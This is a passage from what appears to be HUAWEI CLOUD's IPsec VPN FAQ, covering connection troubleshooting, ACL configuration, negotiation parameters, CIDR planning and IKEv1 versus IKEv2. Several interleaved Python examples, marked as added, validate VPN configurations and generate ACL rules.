        result=$(ping -W 1 -c 1 "$host" | grep 'bytes from ')
        if [ $? -gt 0 ]; then
            echo "$(date +'%Y/%m/%d %H:%M:%S') - host $host is down" | tee -a "$log_name"
        else
            echo "$(date +'%Y/%m/%d %H:%M:%S') - host $host is ok - $(echo "$result" | cut -d ':' -f 2)" | tee -a "$log_name"
        fi
        sleep 5 # avoid a ping flood
    done
    # Run in the background: ./ping.sh x.x.x.x >>/dev/null &

NOTE

1. Use the vi editor to copy the preceding script to the ping.sh file.

2. Run the chmod 777 ping.sh command to grant permissions to the file.

3. Run the ping command:

./ping.sh x.x.x.x >>/dev/null &

x.x.x.x indicates the IP address to be pinged.

4. After the ping command is executed, the x.x.x.x.log file is generated. Run the following command:

tail -f x.x.x.x.log

You can view the long ping result in real time.

1.24 Why Is Not Connected Displayed as the Status for a Successfully Created VPN?

After a VPN is created, its status changes to Normal only after the servers on the two sides of the VPN communicate with each other.

● IKE v1: If no traffic goes through the VPN for a period of time, the VPN needs to be renegotiated. The negotiation time depends on the Lifecycle (s) value in the IPsec policy. Generally, Lifecycle (s) is set to 3600 (1 hour), meaning that the negotiation is initiated in the fifty-fourth minute. If the negotiation succeeds, the connection remains up until the next round of negotiation. If the negotiation fails, the VPN status changes to Not Connected within one hour. The connection can be restored only after the two sides of the VPN communicate with each other. The disconnection can be avoided by using a network monitoring tool, such as IP SLA, to generate packets.
● IKE v2: If no traffic goes through the VPN for a period of time, the VPN remains in the connected status.

1.25 What Can I Do If VPN Connection Setup Fails?

1. Check the IKE and IPsec policies to see whether the negotiation modes and encryption algorithms on the local and remote sides of the VPN are the same.


   a. If the IKE policy has been set up in phase one and the IPsec policy has not been enabled in phase two, the IPsec policies on the local and remote sides of the VPN may be inconsistent.
   b. If a Cisco physical device is used at the customer side, it is recommended that you use MD5. Then, set Authentication Mode to MD5 in the IPsec policy for the VPN created on the cloud.

2. Check whether the ACL configurations are correct. If the subnets of your data center are 192.168.3.0/24 and 192.168.4.0/24, and the VPC subnets are 192.168.1.0/24 and 192.168.2.0/24, configure the ACL rules for each data center subnet to allow communication with the VPC subnets. The following provides an example of ACL configurations:

    rule 1 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.1.0 0.0.0.255
    rule 2 permit ip source 192.168.3.0 0.0.0.255 destination 192.168.2.0 0.0.0.255
    rule 3 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.1.0 0.0.0.255
    rule 4 permit ip source 192.168.4.0 0.0.0.255 destination 192.168.2.0 0.0.0.255

3. After the configuration is complete, ping the local side from the remote side and vice versa to check whether the VPN connection is normal.

1.26 Can an EIP Be Used as a VPN Gateway IP Address?

No.

The IP address of a VPN gateway is assigned when the VPN gateway is created and must be used together with the related configurations. An EIP does not support VPN interconnection.

1.27 Why Is the VPN Connection Always in the Not Connected State Even After Its Configuration Is Complete?

Ensure that the pre-shared keys and negotiation information at both ends are consistent. The local subnet and VPN gateway on the cloud are the remote subnet and remote gateway in the on-premises data center. The remote gateway and remote subnet on the cloud are the local gateway and local subnet in the on-premises data center.

Ensure that the routing, NAT, and security rules are correctly configured on the gateway device of your on-premises data center. Then, ping the servers in the subnets at both ends.

NOTE

VPN is triggered based on data flows. After you configure the VPN, ping the servers in the peer subnet. Before running the ping command, disable the server firewall and allow inbound ICMP requests in the security group on the cloud. Pinging the gateway IP address cannot trigger VPN negotiation. Ping the server in the subnet protected by the gateway.
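The mirror relationship described above, together with the matching pre-shared key and algorithm parameters required in 1.20 and the consistent SA lifecycles from 1.23, can be checked before negotiation is attempted. The following is an added example, not HUAWEI CLOUD code; EndConfig, its field names and the sample addresses are constructed for this example.

```python
"""Cross-check the two ends of an IPsec VPN connection before negotiating.

Added example, not HUAWEI CLOUD code. It encodes the mirror relationship
from FAQ 1.27 (the cloud's local subnets/gateway are the data center's remote
subnets/gateway and vice versa), the matching PSK and negotiation parameters
required by 1.20 and 1.27, and the consistent SA lifecycles from 1.23.
The EndConfig schema and field names are this example's own.
"""
from dataclasses import dataclass
import hmac


@dataclass
class EndConfig:
    """What one side of the tunnel is configured with (constructed schema)."""
    local_gateway: str
    remote_gateway: str
    local_subnets: list
    remote_subnets: list
    psk: str
    ike_version: str
    ike_auth: str
    ike_encr: str
    dh_group: str
    ike_lifetime: int
    ipsec_auth: str
    ipsec_encr: str
    pfs: str
    ipsec_lifetime: int


# Negotiation parameters that must be identical on both ends.
NEGOTIATION_FIELDS = ("ike_version", "ike_auth", "ike_encr", "dh_group",
                      "ike_lifetime", "ipsec_auth", "ipsec_encr", "pfs",
                      "ipsec_lifetime")


def check_peers(cloud: EndConfig, onprem: EndConfig) -> list:
    """Return a list of mismatch descriptions; an empty list means the ends agree."""
    problems = []
    # Mirror checks: each side's local values are the other side's remote values.
    if cloud.local_gateway != onprem.remote_gateway:
        problems.append("cloud local gateway != on-premises remote gateway")
    if cloud.remote_gateway != onprem.local_gateway:
        problems.append("cloud remote gateway != on-premises local gateway")
    if set(cloud.local_subnets) != set(onprem.remote_subnets):
        problems.append("cloud local subnets != on-premises remote subnets")
    if set(cloud.remote_subnets) != set(onprem.local_subnets):
        problems.append("cloud remote subnets != on-premises local subnets")
    # Constant-time comparison so a verification tool does not leak PSK bytes
    # through timing if it is ever run against untrusted input.
    if not hmac.compare_digest(cloud.psk.encode(), onprem.psk.encode()):
        problems.append("pre-shared keys differ")
    for name in NEGOTIATION_FIELDS:
        if getattr(cloud, name) != getattr(onprem, name):
            problems.append(f"{name} differs")
    return problems


def sample_pair(mirrored: bool = True):
    """Constructed sample configs using the FAQ defaults; mirrored=False injects
    a subnet mismatch and an IPsec lifecycle mismatch to show the failures."""
    common = dict(psk="example-psk-not-real", ike_version="v2",
                  ike_auth="SHA2-256", ike_encr="AES-128", dh_group="14",
                  ike_lifetime=86400, ipsec_auth="SHA2-256",
                  ipsec_encr="AES-128", pfs="DH group 14", ipsec_lifetime=3600)
    cloud = EndConfig(local_gateway="203.0.113.10", remote_gateway="198.51.100.20",
                      local_subnets=["192.168.1.0/24", "192.168.2.0/24"],
                      remote_subnets=["192.168.3.0/24", "192.168.4.0/24"], **common)
    onprem_remote = list(cloud.local_subnets) if mirrored else ["192.168.1.0/24"]
    onprem = EndConfig(local_gateway="198.51.100.20", remote_gateway="203.0.113.10",
                       local_subnets=["192.168.3.0/24", "192.168.4.0/24"],
                       remote_subnets=onprem_remote, **common)
    if not mirrored:
        onprem.ipsec_lifetime = 28800  # lifecycle mismatch, see FAQ 1.23
    return cloud, onprem


if __name__ == "__main__":
    for label, pair in (("mirrored", sample_pair()), ("broken", sample_pair(False))):
        print(label, check_peers(*pair) or "OK")
```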


1.28 Do I Need to Configure ACL Rules on the HUAWEI CLOUD Management Console After I Configured ACL Rules on the Gateway Device of the On-premises Data Center?

You need to create ACL rules dedicated to the gateway device of the on-premises data center, and the ACL rules will be referenced by IPsec policies.

When you configure the VPN on the cloud, the ACL rules are automatically generated based on the local and remote subnets entered on the management console and then delivered to the VPN gateway. The number of ACL rules is the number of local subnets multiplied by the number of remote subnets.
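The rule count stated here and the ACL layout shown in 1.25 can both be produced from the two subnet lists. The following is an added example, not HUAWEI CLOUD code, that generates the data center side rules with wildcard masks and refuses overlapping subnets; the function names and the Huawei/H3C-style rule syntax are taken from the FAQ's own example and are assumptions for your device.

```python
"""Generate the on-premises ACL rules for a HUAWEI CLOUD IPsec VPN.

Added example, not HUAWEI CLOUD code. It reproduces the rule layout shown in
FAQ 1.25 ("rule N permit ip source ... destination ..." with wildcard masks)
and the rule-count relationship from 1.28: one rule per
(data center subnet, VPC subnet) pair, i.e. len(local) * len(remote) rules.
"""
from ipaddress import IPv4Network


def wildcard(net: IPv4Network) -> str:
    """Inverted subnet mask as used in ACL rules (e.g. /24 -> 0.0.0.255)."""
    return str(net.hostmask)


def acl_rules(dc_subnets, vpc_subnets, start=1):
    """Return one permit rule per data-center/VPC subnet pair.

    dc_subnets  - subnets in the on-premises data center (ACL source side)
    vpc_subnets - subnets in the HUAWEI CLOUD VPC (ACL destination side)
    Rules are numbered from `start`; the outer loop runs over data center
    subnets, matching the order of the FAQ example.
    """
    dcs = [IPv4Network(s, strict=True) for s in dc_subnets]
    vpcs = [IPv4Network(s, strict=True) for s in vpc_subnets]
    # Overlapping address space can never be routed into the tunnel correctly
    # (see the CIDR planning rules in 2.6), so refuse it up front.
    for d in dcs:
        for v in vpcs:
            if d.overlaps(v):
                raise ValueError(f"data center subnet {d} overlaps VPC subnet {v}")
    rules = []
    n = start
    for d in dcs:
        for v in vpcs:
            rules.append(
                f"rule {n} permit ip source {d.network_address} {wildcard(d)} "
                f"destination {v.network_address} {wildcard(v)}"
            )
            n += 1
    return rules


def expected_rule_count(dc_subnets, vpc_subnets) -> int:
    """The count the console generates: local subnets x remote subnets."""
    return len(dc_subnets) * len(vpc_subnets)


if __name__ == "__main__":
    # Constructed sample: the subnets used in FAQ 1.25.
    for line in acl_rules(["192.168.3.0/24", "192.168.4.0/24"],
                          ["192.168.1.0/24", "192.168.2.0/24"]):
        print(line)
```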


2 Product Consultation

2.1 What Are the Applicable Scenarios of IPsec VPN?

A VPN is a point-to-point connection that implements private network access between two points.

● Applicable scenarios:
  – Create a VPN between different regions of HUAWEI CLOUD to implement communications between VPCs across regions.
  – Create a VPN between HUAWEI CLOUD and another cloud, for example, Alibaba Cloud.
  – Create a VPN between HUAWEI CLOUD and the equipment room of your data center to implement mutual access between a HUAWEI CLOUD VPC and an on-premises network.
  – The VPN HUB function works together with VPC peering connections and Cloud Connect connections to implement mutual access between an on-premises data center and multiple VPCs on the cloud.
  – VPN works with SNAT to access specific IP addresses across clouds.
● Not applicable scenarios:
  – Do not use VPN to connect VPCs in the same region of HUAWEI CLOUD. It is recommended that you use VPC peering connections to enable communications between VPCs in the same region.
  – Do not establish VPN connections between HUAWEI CLOUD and your home network that uses PPPoE dial-up.
  – Do not establish VPN connections between HUAWEI CLOUD and routers (4G or 5G).
  – Do not establish VPN connections between HUAWEI CLOUD and personal terminals.


2.2 What Is a VPC, VPN Gateway, and a VPN Connection?

VPC enables you to create private, isolated virtual networks. You can use VPN to securely access ECSs in VPCs.

A VPN gateway is an egress gateway for a VPC. With a VPN gateway, you can create a secure, reliable, and encrypted connection between a VPC and an on-premises data center or between two VPCs in different regions.

A VPN connection uses IPsec encryption to establish a secure and reliable communications tunnel between a VPN gateway and the gateway in an on-premises data center.

To establish a VPN on the cloud, perform the following steps:

1. Create a VPN gateway. The gateway specifies the VPC to be connected using VPN, and the bandwidth and gateway IP address will be available together with the gateway.
2. Create a VPN connection. The VPN connection specifies the gateway IP address, subnet, and negotiation policies for interconnecting with the customer side.

2.3 What Are the Relationships Between a VPC, a VPN Gateway, and a VPN Connection?

● A VPC is a private network on the cloud. Multiple VPCs can be created in the same region but are isolated from each other. A VPC can be divided into multiple subnets.
● A VPN gateway is created based on a VPC and is the access point of a VPN connection. Only one VPN gateway can be purchased for each VPC, but multiple VPN connections can be created for each gateway.
● A VPN connection is created based on a VPN gateway and is used to connect a VPC to an on-premises data center (or a VPC in another region). That is, each VPN connection connects to a gateway of an on-premises data center.

NOTE

The number of VPN connections is irrelevant to the number of local subnets and remote subnets. It is only related to the number of data centers (or VPCs in other regions) connected to your VPC. The created VPN connections are displayed in the VPN connection list. You can also view the number of VPN connections created for each VPN gateway.

2.4 What Is a VPN Connection? How Do I Set the Number of VPN Connections When Buying a VPN Gateway?

A HUAWEI CLOUD VPN connection is an IPsec connection established between a VPN gateway on the cloud and an independent public IP address of an on-premises data center. You can configure multiple local subnets (subnets in the VPC) and remote subnets (subnets on the on-premises network) for one connection.

The number of VPN connections to be created is determined by the number of data centers. Each VPN connection can connect a VPC to one data center.

NOTE

For example, if CIDR blocks a1 and a2 on HUAWEI CLOUD need to communicate with CIDR blocks b1 and b2 on the on-premises network, one VPN connection is enough. You only need to set Local Subnet to a1,a2 and Remote Subnet to b1,b2 when creating a VPN connection. The following figure shows an example.

2.5 What Is a Remote Gateway and Remote Subnet in a VPN Connection?

When creating a VPN connection, a subnet in the HUAWEI CLOUD VPC is the local subnet and the created VPN gateway is the local gateway. The connected subnet in the on-premises data center is the remote subnet and the gateway in the on-premises data center is the remote gateway.


A remote gateway IP address is a public network IP address. A remote subnet is a subnet of the on-premises data center that needs to connect to a HUAWEI CLOUD VPC through a VPN.

2.6 How Do I Plan the CIDR Block of a VPC Accessed over a VPN Connection?

● The VPC CIDR block cannot overlap or conflict with the on-premises CIDR block.

● To avoid conflicts with cloud service addresses, do not use 127.0.0.0/8, 169.254.0.0/16, 224.0.0.0/3, or 100.64.0.0/10 for your on-premises network.
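The two planning rules above can be checked before a connection is ordered. The following is an added example, not code from this FAQ or from HUAWEI CLOUD; the function and finding names are ours, and it also reports IPv6 blocks because the service is IPv4 only (see 2.19).

```python
"""Plan check for the two CIDR rules in this FAQ: the VPC block must not overlap
the on-premises blocks, and the on-premises network must not use 127.0.0.0/8,
169.254.0.0/16, 224.0.0.0/3 or 100.64.0.0/10. Because HUAWEI CLOUD VPN is IPv4
only (2.19), IPv6 blocks are reported as well. Added example: the function and
finding names are ours, not part of any HUAWEI CLOUD API."""
import ipaddress
from typing import List, Tuple

# Ranges the FAQ says must not be used on the on-premises network.
RESERVED = [ipaddress.ip_network(c) for c in
            ("127.0.0.0/8", "169.254.0.0/16", "224.0.0.0/3", "100.64.0.0/10")]


def check_plan(vpc_cidr: str, onprem_cidrs: List[str]) -> List[Tuple[str, str]]:
    """Return (kind, detail) findings; an empty list means the plan follows both rules.

    kind is "overlap" (on-premises block overlaps the VPC block), "reserved"
    (on-premises block collides with a cloud service range) or "ipv6"."""
    vpc = ipaddress.ip_network(vpc_cidr, strict=False)
    findings: List[Tuple[str, str]] = []
    for cidr in onprem_cidrs:
        net = ipaddress.ip_network(cidr, strict=False)
        if net.version != 4:
            findings.append(("ipv6", f"{net} is IPv6; VPN supports IPv4 only"))
            continue
        # Rule 1: the remote subnet must not overlap or conflict with the VPC block.
        if vpc.overlaps(net):
            findings.append(("overlap", f"{net} overlaps VPC {vpc}"))
        # Rule 2: keep cloud service ranges off the on-premises side.
        for res in RESERVED:
            if net.overlaps(res):
                findings.append(("reserved", f"{net} collides with {res}"))
    return findings


if __name__ == "__main__":
    # Constructed sample plan: one clean remote subnet, one that overlaps the VPC,
    # and one inside the carrier-grade NAT range 100.64.0.0/10.
    sample = ["192.168.3.0/24", "192.168.1.128/25", "100.64.5.0/24"]
    for kind, detail in check_plan("192.168.1.0/24", sample):
        print(kind, "-", detail)
```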

2.7 Will an IPsec VPN Connection Be Established Automatically?

After you complete the configurations on both ends of an IPsec VPN connection, the VPN connection is not established immediately; it is established automatically only after data flows between the two ends of the connection. If no data flows between the cloud and the on-premises data center, the VPN connection always stays in the down state. Any data generated by accessing or pinging servers across the connection can trigger the establishment of the VPN connection.

The establishment of a VPN connection can be triggered either through the gateways of the VPN connection or by the traffic between servers on the cloud and in an on-premises data center.

However, automatic establishment of a VPN connection cannot be triggered by a VPN gateway on HUAWEI CLOUD. Verify that the establishment of your VPN connection can be triggered by the data flows between the two ends of the VPN connection. That is, check whether a VPN connection can be established after you ping a server on the cloud from a server in the on-premises data center, and whether a VPN connection can be established after you disconnect the connection and ping a server in the on-premises data center from a server on the cloud.

NOTE

The source and destination addresses of the ping packets must be protected by the VPN.

Before a VPN connection is established, the gateway IP addresses of both ends can be pinged. However, pinging the gateway IP addresses does not trigger the establishment of the VPN connection.

2.8 What Are the Categories of VPN Service Tickets? How Do I Create a VPN Service Ticket?

1. Log in to the management console.

2. In the upper right corner of the management console, choose Service Tickets > Create Service Ticket.


Figure 2-1 Create Service Ticket

3. Search for VPN and select Virtual Private Network (VPN).

Figure 2-2 Selecting Virtual Private Network (VPN)

4. Select the service ticket type.

Figure 2-3 Selecting the service ticket type


NOTE

When you submit a service ticket, select a ticket type to facilitate problem handling.

Figure 2-4 Ticket category and classification basis

2.9 What Devices Can Be Connected to HUAWEI CLOUD Through a VPN?

HUAWEI CLOUD VPN supports the standard IPsec protocol. Devices in your data center can connect to HUAWEI CLOUD if the following requirements are met:

● Devices support IPsec VPN.

● Your data center has a fixed public IP address or an IP address obtained after performing NAT mapping on a fixed public IP address.

Devices are mostly routers and firewalls. For details about the interconnection configuration, see the Administrator Guide.

NOTE

● Common home broadband routers, personal mobile terminals, and VPN services (such as L2TP) provided by Windows hosts cannot interconnect with HUAWEI CLOUD VPN.

● Devices that can interconnect with the HUAWEI CLOUD VPN service are usually from the following:

– Vendors such as Huawei (routers and firewalls), H3C (routers and firewalls), Cisco (routers and firewalls), Ruijie (routers and firewalls), ZTE, Sangfor, Fortinet, 360, Topsec, Hillstone, NetentSec, NSFOCUS, DELL, ZyXEL, and Juniper

– Cloud service providers such as Alibaba Cloud, Tencent Cloud, and Amazon Web Services

– Software vendors such as Openswan, strongSwan, and GreenBow

● The IPsec protocol is a standard IETF protocol. Devices that support IPsec can interconnect with HUAWEI CLOUD. Most enterprise-level routers and firewalls support the IPsec protocol.

● However, some devices support IPsec VPN only after you purchase the required software licenses. Contact the data center administrator to confirm the device model with the vendor.


2.10 What Are VPN Negotiation Parameters? What Are Their Default Values?

Table 2-1 VPN negotiation parameters

Policy | Parameter | Value
IKE | Authentication Algorithm | SHA2-256 (default), SHA1, MD5, SHA2-384, and SHA2-512
IKE | Encryption Algorithm | AES-128 (default), AES-192, AES-256, and 3DES
IKE | DH Algorithm | Group 14 (default), Group 1, Group 2, Group 5, Group 15, Group 16, Group 19, Group 20, and Group 21. NOTE: In some regions, only Group 14, Group 2, and Group 5 are available.
IKE | Version | v2 (default) and v1
IKE | Lifecycle (s) | 86400 (default). Unit: second. Value range: 60 to 604800
IKE | Negotiation Mode | Main (default) and Aggressive. This parameter is mandatory when Version is set to v1.
IPsec | Authentication Algorithm | SHA2-256 (default), SHA1, MD5, SHA2-384, and SHA2-512
IPsec | Encryption Algorithm | AES-128 (default), AES-192, AES-256, and 3DES
IPsec | PFS | DH group 14 (default), DH group 1, DH group 2, DH group 5, DH group 15, DH group 16, DH group 19, DH group 20, DH group 21, or Disable. NOTE: In some regions, only DH group 14, DH group 2, and DH group 5 are available.
IPsec | Transfer Protocol | ESP (default), AH, and AH-ESP
IPsec | Packet Encapsulation Mode | TUNNEL
IPsec | Lifecycle (s) | 3600 (default). Unit: second. Value range: 480 to 604800

NOTE

● Perfect Forward Secrecy (PFS) is a security feature. IKE negotiation has two phases, phase one and phase two. The key of phase two (IPsec SA) is derived from the key generated in phase one. Once the key in phase one is disclosed, the security of the IPsec VPN may be adversely affected. To improve key security, IKE provides the PFS function. After PFS is turned on, an additional DH exchange is performed during IPsec SA negotiation, and a new IPsec SA key is generated, improving IPsec SA security.

● To ensure security, PFS is enabled on HUAWEI CLOUD by default. Ensure that PFS is also enabled on the gateway in your on-premises data center. Otherwise, the negotiation will fail.

● To enable PFS, ensure that the configurations on both ends of a VPN are the same.

● The traffic-based lifetime of an IPsec SA on the HUAWEI CLOUD VPN defaults to 1,843,200 KB and cannot be changed. This lifetime does not affect the establishment of an IPsec SA.
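Table 2-1 and the note above give everything needed to pre-check a policy pair before negotiation is attempted: every value must be one the console accepts, and both ends (including PFS) must match or the negotiation fails. The following is an added example, not code from this FAQ or from HUAWEI CLOUD; the dict keys and function names are ours, while the allowed values, defaults and the risky choices it warns about (IKEv1 and aggressive mode in 2.22, DH groups 1, 2 and 5 in 2.23) are taken from this page.

```python
"""Check an IKE/IPsec policy pair against Table 2-1 of this FAQ and against the
rule, repeated throughout the FAQ, that both ends must use the same algorithms
and the same PFS setting. Added example: dict keys and function names are ours,
not a HUAWEI CLOUD API; allowed values and defaults come from the table."""
from typing import Dict, List

Policy = Dict[str, object]

AUTH = {"SHA2-256", "SHA1", "MD5", "SHA2-384", "SHA2-512"}
ENC = {"AES-128", "AES-192", "AES-256", "3DES"}
DH = {1, 2, 5, 14, 15, 16, 19, 20, 21}
PROTO = {"ESP", "AH", "AH-ESP"}
# Choices the FAQ itself flags as risky: DH groups 1, 2 and 5 (2.23).
WEAK_DH = {1, 2, 5}


def cloud_defaults() -> Policy:
    """Table 2-1 defaults as configured on the cloud side (PFS enabled)."""
    return {"ike_auth": "SHA2-256", "ike_enc": "AES-128", "ike_dh": 14,
            "ike_version": "v2", "ike_lifetime": 86400, "ike_mode": "Main",
            "ipsec_auth": "SHA2-256", "ipsec_enc": "AES-128", "pfs": 14,
            "ipsec_proto": "ESP", "ipsec_lifetime": 3600}


def validate(p: Policy) -> List[str]:
    """Values outside Table 2-1 (the console would not accept them)."""
    errors = []
    for key, allowed in (("ike_auth", AUTH), ("ike_enc", ENC), ("ike_dh", DH),
                         ("ipsec_auth", AUTH), ("ipsec_enc", ENC),
                         ("ipsec_proto", PROTO), ("ike_version", {"v1", "v2"})):
        if p.get(key) not in allowed:
            errors.append(f"{key}={p.get(key)!r} not in {sorted(allowed, key=str)}")
    if p.get("pfs") != "Disable" and p.get("pfs") not in DH:
        errors.append(f"pfs={p.get('pfs')!r} must be a DH group or 'Disable'")
    if not 60 <= int(p.get("ike_lifetime", 0)) <= 604800:
        errors.append("ike_lifetime must be 60..604800 seconds")
    if not 480 <= int(p.get("ipsec_lifetime", 0)) <= 604800:
        errors.append("ipsec_lifetime must be 480..604800 seconds")
    # Negotiation mode is mandatory only when Version is v1.
    if p.get("ike_version") == "v1" and p.get("ike_mode") not in {"Main", "Aggressive"}:
        errors.append("ike_mode (Main or Aggressive) is mandatory for IKEv1")
    return errors


def mismatches(cloud: Policy, onprem: Policy) -> List[str]:
    """Parameters that differ between the ends; any entry means negotiation fails."""
    return [f"{k}: cloud={cloud[k]} on-premises={onprem.get(k)}"
            for k in cloud if onprem.get(k) != cloud[k]]


def warnings(p: Policy) -> List[str]:
    """Accepted but risky choices, per 2.22 and 2.23 of this FAQ."""
    warn = []
    if p.get("ike_version") == "v1":
        warn.append("IKEv1 is not secure; use v2")
    if p.get("ike_version") == "v1" and p.get("ike_mode") == "Aggressive":
        warn.append("aggressive mode does not protect peer identity")
    for key in ("ike_dh", "pfs"):
        if p.get(key) in WEAK_DH:
            warn.append(f"{key}=DH group {p[key]} has known security risks")
    if p.get("pfs") == "Disable":
        warn.append("PFS disabled: a phase-one key disclosure exposes the IPsec SA")
    return warn


if __name__ == "__main__":
    cloud = cloud_defaults()
    # Constructed on-premises policy: the operator left PFS off and kept IKEv1.
    onprem = dict(cloud, pfs="Disable", ike_version="v1", ike_mode="Aggressive")
    print("errors:", validate(onprem))
    print("mismatches:", mismatches(cloud, onprem))
    print("warnings:", warnings(onprem))
```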

2.11 Are a Username and Password Required for Creating an IPsec VPN Connection?

No. HUAWEI CLOUD IPsec VPN uses a pre-shared key (PSK) for authentication. The key is configured on a VPN gateway. A tunnel will be established after VPN negotiation is complete. Therefore, usernames and passwords are not required.

Generally, SSL, PPTP, and L2TP VPNs use usernames and passwords for authentication.

NOTE

IPsec XAUTH is an extension of IPsec VPN. It prompts users to enter their usernames and passwords during VPN negotiation. HUAWEI CLOUD VPN does not support IPsec XAUTH.

2.12 How Do I Allow Specific Servers to Access a Subnet on the Cloud Through a Created VPN Connection?

Configurations off the cloud

● Configure deny rules on VPN devices.

● Configure ACLs on routers or switches.

Configurations on the cloud


● Configure security group rules to deny access from specific IP addresses.

● Configure network ACL rules.

NOTE

All rules must be added to the device before the VPN tunnel is established. Do not change the local subnet and the remote subnet to restrict the access.

2.13 Which VPN Resources Can Be Monitored?

VPN Gateway

Bandwidth information that can be monitored includes inbound traffic, inbound bandwidth, outbound traffic, outbound bandwidth, and outbound bandwidth usage.

To view VPN gateway metrics, locate the target VPN gateway and click View Metric in the Operation column.

VPN Connection

The VPN connection status can be monitored.

Value 1 indicates that the connection is normal.

Value 0 indicates that the connection is down.

To view the VPN connection status, locate the target VPN connection and click View Metric in the Operation column.

2.14 Can an EIP Be Used as a VPN Gateway IP Address?

No.

The IP address of a VPN gateway is assigned when the VPN gateway is created and must be used together with the related configurations. An EIP does not support VPN interconnection.

2.15 Do I Need to Purchase an EIP for Servers That Communicate with Each Other Through a VPN?

If a server in your data center needs to access an ECS on the cloud through a VPN, you do not need to purchase an EIP.

If the ECS needs to provide services accessible from the Internet, an EIP is required.

2.16 Are SSL VPNs Supported?

Currently, SSL VPNs are not supported.


2.17 How Long Does It Take for Delivered VPN Configurations to Take Effect?

It takes 1 to 5 minutes for the VPN configurations to take effect.

NOTE

After the VPN configurations take effect, configure the gateway on your side to complete tunnel negotiation with the VPN gateway on HUAWEI CLOUD. Then, the VPN connection is successfully established.

2.18 What Should I Do If I Cannot Create Connections for a VPN Gateway That Has No Bandwidth Information?

If a VPN gateway has no bandwidth information, the VPN is of the old edition, and this type of VPN can no longer be created on HUAWEI CLOUD.

● Only one VPN connection can be created for each VPN gateway of the old edition, and its bandwidth is not guaranteed. You can delete the gateway and create one of the new edition (service running will be affected).

● You can also submit a service ticket to change the gateway to one of the new edition (service running will not be affected). By default, the bandwidth of a VPN gateway changed to the new edition is 10 Mbit/s. You can adjust the bandwidth as required. The bandwidth of a VPN gateway that is billed on a yearly/monthly basis cannot be decreased.

2.19 Does HUAWEI CLOUD VPN Support IPv6 Addresses?

No.

HUAWEI CLOUD VPN only supports IPv4 addresses.

2.20 How Do I Determine My VPN Bandwidth Size?

Consider the following when you determine the bandwidth:

● Amount of data transmitted over a VPN tunnel in a period of time (reserve enough bandwidth to prevent link congestion).

● The egress bandwidth at the cloud end of the VPN connection must be less than that at the off-cloud end of the VPN connection.


2.21 Does a VPN Connection Support Chinese Encryption Algorithms?

No.

Use the algorithms provided on the HUAWEI CLOUD management console for negotiation. Ensure that the algorithms used at both ends are the same.

2.22 Which IKE Version Should I Select When I Create a VPN Connection?

HUAWEI CLOUD recommends that you select IKEv2 for negotiation because IKEv1 is not secure. In addition, IKEv2 has better performance than IKEv1 in terms of connection negotiation and establishment, authentication methods, DPD timeout, and SA timeout.

HUAWEI CLOUD will not support IKEv1 soon.

Introduction to IKEv1 and IKEv2

● IKEv1 is a hybrid protocol, and its own complexity inevitably brings some security and performance defects, which have become the bottleneck of the current IPsec system.

● The IKEv2 protocol retains the basic functions of IKEv1 and overcomes the problems found while studying IKEv1. Moreover, for considerations of simplicity, efficiency, security, and robustness, the relevant IKE documents are replaced by RFC 4306. By minimizing core functions and default cryptographic algorithms, IKEv2 greatly improves interoperability among different IPsec VPNs.

IKEv1 Security Vulnerabilities

● The cryptographic algorithms supported by IKEv1 have not been updated for more than 10 years. Also, IKEv1 does not support strong cryptographic algorithms such as AES-GCM and ChaCha20-Poly1305. For IKEv1, the E (Encryption) bit in the ISAKMP header specifies that the payloads following the ISAKMP header are encrypted, but any data integrity verification of those payloads is handled by a separate hash payload. This separation of encryption from data integrity protection prevents the use of authenticated encryption (AES-GCM) with IKEv1.

● The IKEv1 protocol is vulnerable to DoS amplification attacks and to half-open connections. IKEv2 can defend against DoS attacks.

● The IKEv1 aggressive mode is not secure enough. In aggressive mode, information packets are not encrypted. It is also exposed to brute-force and man-in-the-middle attacks.


Differences Between IKEv1 and IKEv2

● Negotiation process

– IKEv1 SA negotiation consists of two phases. IKEv1 is complex and occupies a large amount of bandwidth. IKEv1 phase 1 negotiation aims to establish the IKE SA. This process supports the main mode and aggressive mode. Main mode uses six ISAKMP messages to establish the IKE SA, but aggressive mode uses only three. Therefore, aggressive mode is faster in IKE SA establishment. However, aggressive mode does not provide peer identity protection because key exchange and identity authentication are performed at the same time. IKEv1 phase 2 negotiation aims to set up the IPsec SA for data transmission. This process uses the quick exchange mode (3 ISAKMP messages) to complete the negotiation.

– Compared with IKEv1, IKEv2 simplifies the SA negotiation process. IKEv2 uses two exchanges (a total of 4 messages) to create an IKE SA and a pair of IPsec SAs. To create multiple pairs of IPsec SAs, only one additional exchange is needed for each additional pair of SAs.

NOTE

For IKEv1 negotiation, main mode requires nine (6+3) packets in total and aggressive mode requires six (3+3) packets. IKEv2 negotiation requires only four (2+2) packets.

● Authentication methods

– Only IKEv1 (requiring an encryption card) supports digital envelope authentication (HSS-DE).

– IKEv2 supports EAP authentication. IKEv2 can use an AAA server to remotely authenticate mobile and PC users and assign private IP addresses to these users. IKEv1 does not provide this function and must use L2TP to assign private IP addresses.

– Only IKEv2 supports IKE SA integrity algorithms.

● DPD timeout

– Only IKEv1 supports the retry-interval parameter. If a device sends a DPD packet but receives no reply within the specified retry-interval, the device records a DPD failure event. When the number of failure events reaches five, both the IKE SA and IPsec SA are deleted. The IKE SA negotiation will be started again when the device has IPsec traffic to handle.

– In IKEv2 mode, the retransmission interval increases from 1, 2, 4, 8, 16, 32 to 64 seconds. If no reply is received within eight consecutive transmissions, the peer end is considered dead, and the IKE SA and IPsec SA will be deleted.

● IKE SA timeout and IPsec SA timeout

In IKEv2, the IKE SA soft lifetime is 9/10 of the IKE SA hard lifetime plus or minus a random value to reduce the likelihood that two endpoints initiate re-negotiation at the same time. Therefore, the soft lifetime does not require manual settings in IKEv2.


Advantages of IKEv2 Over IKEv1

● Simplified SA negotiation process, improving negotiation efficiency.

● Closed many cryptographic loopholes, improving security.

● Supports Extensible Authentication Protocol (EAP) authentication, improving authentication flexibility and scalability.

● EAP is an authentication protocol that supports multiple authentication methods. The biggest advantage of EAP is scalability. That is, new authentication modes can be added without changing the original authentication system. Currently, EAP authentication has been widely used in dial-up access networks.

● IKEv2 employs an encrypted payload that is based on the design of ESP. The IKEv2 encrypted payload associates encryption and data integrity protection in a fashion that makes it possible to use authenticated encryption algorithms. AES-GCM ensures confidentiality, integrity, and authentication.

2.23 What Are the Bits of the DH Groups Used by HUAWEI CLOUD VPN?

The Diffie-Hellman (DH) groups determine the strength of the key used in the key exchange process. Higher DH group numbers are usually more secure, but extra time is required to calculate the key.

